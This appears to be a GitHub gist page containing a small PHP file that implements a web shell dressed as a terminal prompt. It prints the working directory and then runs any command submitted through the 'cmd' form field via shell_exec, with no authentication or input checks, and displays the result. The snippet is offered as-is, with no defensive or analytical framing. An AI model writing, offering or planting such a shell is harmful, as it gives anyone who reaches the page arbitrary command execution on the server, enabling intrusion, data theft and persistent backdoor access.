Skip to content

Instantly share code, notes, and snippets.

@cooperq
Created August 25, 2012 03:25
Show Gist options
  • Save cooperq/3459952 to your computer and use it in GitHub Desktop.
Save cooperq/3459952 to your computer and use it in GitHub Desktop.
<html>
<head>
<style>
body{
background: #000000;
color: #00ff00;
font-family: courier
}
input{
border: none;
color: #00ff00;
background: #000;
display: inline;
float: left;
}
span{
float:left;
}
.clear{clear:both;}
</style>
</head>
<body>
<form method='post' name='cmdform'>
<span>
<?php print(shell_exec('pwd'));?>$
</span>
<input type='text' name='cmd' autofocus />
</form>
<?php
if($_POST['cmd']){
print "<div class='clear'><pre>";
print shell_exec($_POST['cmd']);
print "</pre></div>";
}
?>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment